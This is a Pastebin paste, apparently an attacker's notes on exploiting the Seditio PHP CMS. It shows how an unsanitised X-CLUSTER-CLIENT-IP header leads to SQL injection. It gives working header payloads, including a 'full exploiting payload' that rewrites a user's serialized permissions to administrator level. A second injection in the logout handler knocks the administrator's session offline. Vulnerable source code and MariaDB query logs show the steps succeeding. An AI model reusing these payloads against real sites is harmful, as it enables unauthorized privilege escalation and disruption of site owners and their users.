API tools faq
paste
Guest User

seditio fuck

a guest
May 21st, 2013
268
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.26 KB | None | 0 0
raw download clone embed print report
  1. $cfg['clustermode'] = ADMIN PANEL checkbox YES and value true :)
  2.  
  3. $usr['ip'] = ($cfg['clustermode']) ? $_SERVER['HTTP_X_CLUSTER_CLIENT_IP'] : $_SERVER['REMOTE_ADDR'] ;
  4.  
  5. NOT VALIDATE and SANITIZE
  6.  
  7. SQL Injection :)
  8.  
  9. sed_sql_query("UPDATE $db_users SET user_lastip='".$usr['ip']."' WHERE user_id='".$row['user_id']."' LIMIT 1");
  10.  
  11.  
  12. Authentication page (Header)
  13.  
  14. X-CLUSTER-CLIENT-IP: 127.0.0.1' or 1='1
  15.  
  16. QUERY SNIP____
  17.  
  18. MariaDB [sed]> UPDATE sed_users SET user_lastip='127.0.0.1' or 1=1 WHERE user_id=1;
  19. /*BLIND SQL*/
  20. +-------------+-----------+
  21. | user_lastip | user_name |
  22. +-------------+-----------+
  23. | 1 | admin |
  24. +-------------+-----------+
  25. 1 row in set (0.00 sec)
  26.  
  27.  
  28. MariaDB [sed]> select user_lastip,user_name from sed_users;
  29.  
  30. +-------------+-----------+
  31. | user_lastip | user_name |
  32. +-------------+-----------+
  33. | 1 | admin |
  34. +-------------+-----------+
  35. 1 row in set (0.00 sec)
  36.  
  37. second vector
  38.  
  39. MariaDB [sed]> select user_lastip,user_name from sed_users where user_id=1;
  40. +------------------+-----------+
  41. | user_lastip | user_name |
  42. +------------------+-----------+
  43. | 5.5.30-MariaDB-m | admin |
  44. +------------------+-----------+
  45. 1 row in set (0.00 sec)
  46.  
  47.  
  48. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  49. and privileges Escaltion :P
  50.  
  51.  
  52. MariaDB [sed]> select * from sed_auth where auth_code='admin';
  53. +---------+--------------+-----------+-------------+-------------+------------------+------------------+
  54. | auth_id | auth_groupid | auth_code | auth_option | auth_rights | auth_rights_lock | auth_setbyuserid |
  55. +---------+--------------+-----------+-------------+-------------+------------------+------------------+
  56. | 1 | 1 | admin | a | 0 | 255 | 1 |
  57. | 2 | 2 | admin | a | 0 | 255 | 1 |
  58. | 3 | 3 | admin | a | 0 | 255 | 1 |
  59. | 4 | 4 | admin | a | 0 | 255 | 1 |
  60. | 5 | 5 | admin | a | 255 | 255 | 1 |
  61. | 76 | 6 | admin | a | 1 | 0 | 1 |
  62. +---------+--------------+-----------+-------------+-------------+------------------+------------------+
  63.  
  64. 6 rows in set (0.01 sec) = > privileges selection
  65.  
  66.  
  67. MariaDB [sed]> select auth_groupid,auth_rights from sed_auth where auth_code='admin';
  68. +--------------+-------------+
  69. | auth_groupid | auth_rights |
  70. +--------------+-------------+
  71. | 1 | 0 |
  72. | 2 | 0 |
  73. | 3 | 0 |
  74. | 4 | 0 |
  75. | 5 | 255 |
  76. | 6 | 1 |
  77. +--------------+-------------+
  78. 6 rows in set (0.20 sec)
  79.  
  80.  
  81. = > administrator group int(5)
  82.  
  83.  
  84. administrator rights = > 255 (admin panel keys :D)
  85.  
  86.  
  87. MariaDB [sed]> select grp_id,grp_alias from sed_groups;
  88. +--------+----------------+
  89. | grp_id | grp_alias |
  90. +--------+----------------+
  91. | 1 | guests |
  92. | 2 | inactive |
  93. | 3 | banned |
  94. | 4 | members |
  95. | 5 | administrators |
  96. | 6 | moderators |
  97. +--------+----------------+
  98. 6 rows in set (0.02 sec)
  99.  
  100.  
  101. members request output serialize() call
  102.  
  103. /*
  104. a:13:{s:5:"admin";a:1:{s:1:"a";i:0;}s:8:"comments";a:1:{s:1:"a";i:3;}s:6:"forums";a:2:{i:1;i:3;i:2;i:3;}s:7:"gallery";a:1:{s:1:"a";i:1;}s:5:"index";a:1:{s:1:"a";i:1;}s:7:"message";a:1:{s:1:"a";i:1;}s:4:"page";a:4:{s:8:"articles";i:3;s:4:"news";i:3;s:7:"sample1";i:3;s:7:"sample2";i:3;}s:3:"pfs";a:1:{s:1:"a";i:3;}s:4:"plug";a:13:{s:7:"adminqv";i:1;s:7:"cleaner";i:1;s:7:"contact";i:3;s:14:"massmovetopics";i:0;s:4:"news";i:1;s:11:"passrecover";i:1;s:11:"recentitems";i:1;s:6:"search";i:1;s:10:"skineditor";i:3;s:10:"statistics";i:1;s:8:"syscheck";i:3;s:7:"tinymce";i:1;s:10:"whosonline";i:1;}s:2:"pm";a:1:{s:1:"a";i:3;}s:5:"polls";a:1:{s:1:"a";i:3;}s:7:"ratings";a:1:{s:1:"a";i:3;}s:5:"users";a:1:{s:1:"a";i:3;}}
  105.  
  106.  
  107. members "admin";a:1:{s:1:"a";i:0;}
  108.  
  109. key (admin) value (a) = > int("0") - (member rights)
  110.  
  111.  
  112. MariaDB [sed]> select auth_groupid,auth_rights from sed_auth where auth_code='admin' and auth_groupid=4;
  113. +--------------+-------------+
  114. | auth_groupid | auth_rights |
  115. +--------------+-------------+
  116. | 4 | 0 |
  117. +--------------+-------------+
  118.  
  119. */
  120.  
  121. if (empty($row['user_auth']))
  122. {
  123. $usr['auth'] = sed_auth_build($usr['id'], $usr['maingrp']);
  124. $sys['sql_update_auth'] = ", user_auth='".serialize($usr['auth'])."'";
  125. }
  126.  
  127.  
  128.  
  129. administrator request :)
  130. and output result
  131.  
  132. /* output result
  133. a:13:{s:5:"admin";a:1:{s:1:"a";i:255;}s:8:"comments";a:1:{s:1:"a";i:255;}s:6:"forums";a:2:{i:1;i:255;i:2;i:255;}s:7:"gallery";a:1:{s:1:"a";i:255;}s:5:"index";a:1:{s:1:"a";i:255;}s:7:"message";a:1:{s:1:"a";i:255;}s:4:"page";a:4:{s:8:"articles";i:255;s:4:"news";i:255;s:7:"sample1";i:255;s:7:"sample2";i:255;}s:3:"pfs";a:1:{s:1:"a";i:255;}s:4:"plug";a:13:{s:7:"adminqv";i:255;s:7:"cleaner";i:255;s:7:"contact";i:255;s:14:"massmovetopics";i:255;s:4:"news";i:255;s:11:"passrecover";i:255;s:11:"recentitems";i:255;s:6:"search";i:255;s:10:"skineditor";i:255;s:10:"statistics";i:255;s:8:"syscheck";i:255;s:7:"tinymce";i:255;s:10:"whosonline";i:255;}s:2:"pm";a:1:{s:1:"a";i:255;}s:5:"polls";a:1:{s:1:"a";i:255;}s:7:"ratings";a:1:{s:1:"a";i:255;}s:5:"users";a:1:{s:1:"a";i:255;}}
  134.  
  135.  
  136.  
  137. +++++++++++++++++++++++++++++++++++
  138. admin "admin";a:1:{s:1:"a";i:255;}
  139.  
  140. key (admin) value (a) = > int("0") - (member rights)
  141.  
  142. MariaDB [sed]> select auth_groupid,auth_rights from sed_auth where auth_code='admin' and auth_groupid=5;
  143. +--------------+-------------+
  144. | auth_groupid | auth_rights |
  145. +--------------+-------------+
  146. | 5 | 255 |
  147. +--------------+-------------+
  148.  
  149.  
  150. */
  151.  
  152.  
  153. =========================================================
  154.  
  155. function sed_auth_build($userid, $maingrp=0)
  156. {
  157. global $db_auth, $db_groups_users;
  158.  
  159. $groups = array();
  160. $authgrid = array();
  161. $tmpgrid = array();
  162.  
  163. if ($userid==0 || $maingrp==0)
  164. {
  165. $groups[] = 1;
  166. }
  167. else
  168. {
  169. $groups[] = $maingrp;
  170. $sql = sed_sql_query("SELECT gru_groupid FROM $db_groups_users WHERE gru_userid='$userid'");
  171.  
  172. while ($row = sed_sql_fetchassoc($sql))
  173. { $groups[] = $row['gru_groupid']; }
  174. }
  175.  
  176. $sql_groups = implode(',', $groups);
  177. $sql = sed_sql_query("SELECT auth_code, auth_option, auth_rights FROM $db_auth WHERE auth_groupid IN (".$sql_groups.") ORDER BY auth_code ASC, auth_option ASC");
  178.  
  179. while ($row = sed_sql_fetchassoc($sql))
  180. { $authgrid[$row['auth_code']][$row['auth_option']] |= $row['auth_rights']; }
  181.  
  182. return($authgrid); }
  183.  
  184. //update priviliges
  185.  
  186.  
  187. $sql = sed_sql_query("UPDATE $db_users SET user_lastlog='".$sys['now_offset']."', user_lastip='".$usr['ip']."', user_sid='".$usr['sessionid']."', user_logcount=user_logcount+1 ".$sys['sql_update_lastvisit']." ".$sys['sql_update_auth']." WHERE user_id='".$usr['id']."'");
  188.  
  189.  
  190. Evaluation of the rights admin.
  191.  
  192. $di=unserialize($usr['auth']);
  193. echo $di['admin']['a']; //output 255 :) then the verification :P
  194.  
  195.  
  196. Priviliges escaltion exploitation
  197.  
  198. problem banlist section :)
  199.  
  200. $usr['ip']="127.0.0.1'or 1=1--";
  201. $userip = explode('.', $usr['ip']);
  202. $ipmasks = "('".$userip[0].".".$userip[1].".".$userip[2].".".$userip[3]."','".$userip[0].".".$userip[1].".".$userip[2].".*','".$userip[0].".".$userip[1].".*.*','".$userip[0].".*.*.*')";
  203. var_dump($userip);
  204.  
  205. IPv4#Addressing 127.0.0.1'or 1=1--
  206.  
  207. echo $usrip[3]; //output result
  208.  
  209. IN(127.0.0.1') or usr_auth='blah'-- -)
  210. nooo syntax :)
  211.  
  212. second query (Update statement)
  213.  
  214. 130516 21:25:52 66 Query UPDATE sed_users SET user_lastlog='1368721491', user_lastip='12.3.44.4.4') or usr_auth='blah' -- -
  215.  
  216. true syntax? = nono :)
  217.  
  218.  
  219. 4 th key :)
  220.  
  221. $usr['ip']="127.0.0.1.4'or 1=1-- -";
  222. var_dump($usr['ip']); //output 4'or 1=1-- -
  223.  
  224. 4 th key not used
  225.  
  226. me login: administrator
  227. MariaDB [sed]> select user_auth from sed_users where user_name='administrator'\G
  228. *************************** 1. row ***************************
  229. user_auth: a:13:{s:5:"admin";a:1:{s:1:"a";i:0;}s:8:"comments";a:1:{s:1:"a";i:3;}s:6:"forums";a:2:{i:1;i:3;i:2;i:3;}s:7:"gallery";a:1:{s:1:"a";i:1;}s:5:"index";a:1:{s:1:"a";i:1;}s:7:"message";a:1:{s:1:"a";i:1;}s:4:"page";a:4:{s:8:"articles";i:3;s:4:"news";i:3;s:7:"sample1";i:3;s:7:"sample2";i:3;}s:3:"pfs";a:1:{s:1:"a";i:3;}s:4:"plug";a:13:{s:7:"adminqv";i:1;s:7:"cleaner";i:1;s:7:"contact";i:3;s:14:"massmovetopics";i:0;s:4:"news";i:1;s:11:"passrecover";i:1;s:11:"recentitems";i:1;s:6:"search";i:1;s:10:"skineditor";i:3;s:10:"statistics";i:1;s:8:"syscheck";i:3;s:7:"tinymce";i:1;s:10:"whosonline";i:1;}s:2:"pm";a:1:{s:1:"a";i:3;}s:5:"polls";a:1:{s:1:"a";i:3;}s:7:"ratings";a:1:{s:1:"a";i:3;}s:5:"users";a:1:{s:1:"a";i:3;}}
  230. 1 row in set (0.44 sec)
  231.  
  232. (admin) key (a) value => "0" no perm :D
  233. change perm via sql injection (Priviliges escaltion)
  234.  
  235. No Cookie option
  236.  
  237. if ($cfg['authmode']==2 || $cfg['authmode']==3)
  238. { session_start(); }
  239.  
  240. if (isset($_SESSION['rsedition']) && ($cfg['authmode']==2 || $cfg['authmode']==3))
  241. {
  242. $rsedition = $_SESSION['rsedition'];
  243. $rseditiop = $_SESSION['rseditiop'];
  244. $rseditios = $_SESSION['rseditios'];
  245. }
  246. elseif (isset($_COOKIE['SEDITIO']) && ($cfg['authmode']==1 || $cfg['authmode']==3))
  247. {
  248. $u = base64_decode($_COOKIE['SEDITIO']);
  249. $u = explode(':_:',$u);
  250. $rsedition = sed_import($u[0],'D','INT');
  251. $rseditiop = sed_import($u[1],'D','H32');
  252. $rseditios = sed_import($u[2],'D','ALP');
  253. }
  254.  
  255. if ($rsedition>0 && $cfg['authmode']>0)
  256. {
  257. if (mb_strlen($rseditiop)!=32)
  258. { sed_diefatal('Wrong value for the password.'); }
  259.  
  260. if ($cfg['ipcheck'])
  261. { $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop' AND user_lastip='".$usr['ip']."'"); }
  262. else
  263. { $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop'"); }
  264.  
  265. if ($row = sed_sql_fetcharray($sql))
  266. {
  267. if ($row['user_maingrp']>3)
  268. {
  269. $usr['id'] = $row['user_id'];
  270. $usr['sessionid'] = ($cfg['authmode']==1) ? md5($row['user_lastvisit']) : session_id();
  271. $usr['name'] = $row['user_name'];
  272. $usr['maingrp'] = $row['user_maingrp'];
  273. $usr['lastvisit'] = $row['user_lastvisit'];
  274. $usr['lastlog'] = $row['user_lastlog'];
  275. $usr['timezone'] = $row['user_timezone'];
  276. $usr['skin'] = ($cfg['forcedefaultskin']) ? $cfg['defaultskin'] : $row['user_skin'];
  277. $usr['lang'] = ($cfg['forcedefaultlang']) ? $cfg['defaultlang'] : $row['user_lang'];
  278. $usr['newpm'] = $row['user_newpm'];
  279. $usr['auth'] = unserialize($row['user_auth']);
  280. $usr['level'] = $sed_groups[$usr['maingrp']]['level'];
  281. $usr['profile'] = $row;
  282.  
  283. if ($usr['lastlog']+$cfg['timedout'] < $sys['now_offset'])
  284. {
  285. $sys['comingback']= TRUE;
  286. $usr['lastvisit'] = $usr['lastlog'];
  287. $sys['sql_update_lastvisit'] = ", user_lastvisit='".$usr['lastvisit']."'";
  288. }
  289.  
  290. if (empty($row['user_auth']))
  291. {
  292. $usr['auth'] = sed_auth_build($usr['id'], $usr['maingrp']);
  293. $sys['sql_update_auth'] = ", user_auth='".serialize($usr['auth'])."'";
  294. }
  295.  
  296. // $sql = sed_sql_query("UPDATE $db_users SET user_lastlog='".$sys['now_offset']."', user_lastip='".$usr['ip']."', user_sid='".$usr['sessionid']."', user_logcount=user_logcount+1 ".$sys['sql_update_lastvisit']." ".$sys['sql_update_auth']." WHERE user_id='".$usr['id']."'");
  297. }
  298. }
  299. }
  300.  
  301.  
  302. Cookie header send
  303.  
  304. Cookie: PHPSESSID=blablablasessionidrseditionandauthmode
  305.  
  306. if true :/ (if ($rsedition>0 && $cfg['authmode']>0));
  307.  
  308. if ($rsedition>0 && $cfg['authmode']>0)
  309. {
  310. if (mb_strlen($rseditiop)!=32)
  311. { sed_diefatal('Wrong value for the password.'); }
  312.  
  313. if ($cfg['ipcheck'])
  314. { $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop' AND user_lastip='".$usr['ip']."'"); }
  315. else
  316. { $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop'"); }
  317.  
  318.  
  319. file: config.php
  320. section: $cfg['ipcheck']=true;
  321.  
  322. fail syntax
  323.  
  324. $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop' AND user_lastip='".$usr['ip']."'");
  325.  
  326. my vector and fail syntax
  327.  
  328. 127.0.0.1.4',user_auth=replace(user_auth,'admin";a:1:{s:1:"a";i:0;}','admin";a:1:{s:1:"a";i:255;}') WHERE user_id=3 -- -
  329.  
  330.  
  331. full snip query
  332.  
  333. +++++++++++++++++++++++++++++++++++++
  334. SELECT * FROM $db_users WHERE user_id='3 AND user_password='blah' AND user_lastip='127.0.0.1.4',user_auth=replace(user_auth,'admin";a:1:{s:1:"a";i:0;}','admin";a:1:{s:1:"a";i:255;}') WHERE user_id=3 -- -'
  335.  
  336. Failure syntax :(
  337.  
  338. LOGIN PAGE REQUEST (HTTP HEADER)
  339. X-CLUSTER-CLIENT-IP: 127.0.0.1.4',user_auth=replace(user_auth,'admin";a:1:{s:1:"a";i:0;}','admin";a:1:{s:1:"a";i:255;}') WHERE user_id=3 -- -
  340.  
  341. http://s18.postimg.org/xcjy55mkp/fullquery.png
  342.  
  343.  
  344. return false if the cookie option is empty
  345.  
  346. /*
  347. if ($rsedition>0 && $cfg['authmode']>0) // output result false :) (no cookie option)
  348. */
  349.  
  350.  
  351. after the introduction mysql query log :)
  352.  
  353. 326 Query SELECT user_id, user_maingrp, user_banexpire, user_skin, user_lang FROM sed_users WHERE user_password='3e1f0522ece29f7be6f69cd3bfb2d9a8' AND user_name='admin'
  354. 326 Query UPDATE sed_users SET user_lastip='127.0.0.1.4',user_auth='getsikdir!!!!!!!!!!!!!!!!!!' WHERE user_id=3 -- -' WHERE user_id='1' LIMIT 1
  355. 326 Query DELETE FROM sed_online WHERE online_userid='-1' AND online_ip='127.0.0.1.4',user_auth='getsikdir!!!!!!!!!!!!!!!!!!' WHERE user_id=3 -- -' LIMIT 1
  356. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  357.  
  358. AFTER
  359.  
  360. Full exploiting payload
  361.  
  362. 127.0.0.1.4',user_auth=replace(user_auth,'admin";a:1:{s:1:"a";i:0;}','admin";a:1:{s:1:"a";i:255;}') WHERE user_id=3 -- -
  363.  
  364. MariaDB [sed]> select user_auth from sed_users where user_name='administrator'\G*************************** 1. row ***************************
  365. user_auth: a:13:{s:5:"admin";a:1:{s:1:"a";i:255;}s:8:"comments";a:1:{s:1:"a";i:3;}s:6:"forums";a:2:{i:1;i:3;i:2;i:3;}s:7:"gallery";a:1:{s:1:"a";i:1;}s:5:"index";a:1:{s:1:"a";i:1;}s:7:"message";a:1:{s:1:"a";i:1;}s:4:"page";a:4:{s:8:"articles";i:3;s:4:"news";i:3;s:7:"sample1";i:3;s:7:"sample2";i:3;}s:3:"pfs";a:1:{s:1:"a";i:3;}s:4:"plug";a:13:{s:7:"adminqv";i:1;s:7:"cleaner";i:1;s:7:"contact";i:3;s:14:"massmovetopics";i:0;s:4:"news";i:1;s:11:"passrecover";i:1;s:11:"recentitems";i:1;s:6:"search";i:1;s:10:"skineditor";i:3;s:10:"statistics";i:1;s:8:"syscheck";i:3;s:7:"tinymce";i:1;s:10:"whosonline";i:1;}s:2:"pm";a:1:{s:1:"a";i:3;}s:5:"polls";a:1:{s:1:"a";i:3;}s:7:"ratings";a:1:{s:1:"a";i:3;}s:5:"users";a:1:{s:1:"a";i:3;}}
  366. 1 row in set (0.00 sec)
  367.  
  368. "admin";a:1:{s:1:"a";i:255;}
  369.  
  370. value = > "255" WTF ? :D ??
  371.  
  372. ADMIN PANEL :D
  373.  
  374. http://s22.postimg.org/whujo6xu9/lol.png
  375.  
  376.  
  377. ==============================================================
  378.  
  379. Unauthorized user *logout*
  380.  
  381. MariaDB [sed]> select online_ip,online_name from sed_online;
  382. +-----------+-------------+
  383. | online_ip | online_name |
  384. +-----------+-------------+
  385. | 127.0.0.1 | admin |
  386. | 128.0.0.2 | user |
  387. +-----------+-------------+
  388. 2 row in set (0.00 sec)
  389.  
  390. me login => user :)
  391.  
  392. Logout page request (HEADER) = > logout.php
  393.  
  394. X-CLUSTER-CLIENT-IP: 127.0.0.1
  395.  
  396. if ($usr['id']>0)
  397. {
  398. $sql = sed_sql_query("DELETE FROM $db_online WHERE online_ip='".$usr['ip']."'");
  399. sed_redirect("message.php?msg=".$usr['ip']);
  400. exit;
  401. }
  402.  
  403. echo $usr['ip'] => Output 127.0.0.1222233' or online_name='admin' (Spoof X IP)-(Administrator IP :D) :)
  404.  
  405. QUERY EXEC - > $sql = sed_sql_query("DELETE FROM $db_online WHERE online_ip='127.0.0.1222233' or online_name='admin'");
  406.  
  407. ???? profit = administrator panic :D
  408.  
  409.  
  410. my favorit :) http://www.youtube.com/watch?v=ruFt9ZvBnvo
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!